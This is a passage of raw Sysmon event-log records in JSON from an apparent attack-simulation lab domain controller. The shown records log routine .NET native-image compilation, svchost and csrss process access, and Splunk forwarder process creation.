08:05:45.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2259-5F25-0000-001015E80D00}","TargetProcessId":"3824","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7578,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:45.319\r\nProcessGuid: {41C8662E-2259-5F25-0000-001015E80D00}\r\nProcessId: 3824\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ef0-0\\PresentationFramework.Royale.dll\r\nCreationUtcTime: 2020-08-01 08:05:45.319","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:45.319","ProcessGuid":"{41C8662E-2259-5F25-0000-001015E80D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ef0-0\\PresentationFramework.Royale.dll","CreationUtcTime":"2020-08-01 08:05:45.319","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7579,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.366\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010D66A0C00}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.366","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010D66A0C00}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7580,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.366\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010D66A0C00}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.366","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010D66A0C00}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7581,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.366\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2248-5F25-0000-0010D66A0C00}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.366","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2248-5F25-0000-0010D66A0C00}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7582,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.507\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2259-5F25-0000-00104CF10D00}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.507","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2259-5F25-0000-00104CF10D00}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7583,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.507\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2259-5F25-0000-00104CF10D00}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.507","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2259-5F25-0000-00104CF10D00}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7584,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.523\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2259-5F25-0000-00104CF10D00}\r\nTargetProcessId: 4232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.523","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2259-5F25-0000-00104CF10D00}","TargetProcessId":"4232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:46","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":7585,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.820\r\nProcessGuid: {41C8662E-2259-5F25-0000-001094F60D00}\r\nProcessId: 3788\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 08:05:45.820","ProcessGuid":"{41C8662E-2259-5F25-0000-001094F60D00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 08:05:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:45","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7586,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:45.819\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-0010860E0C00}\r\nTargetProcessId: 3788\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program 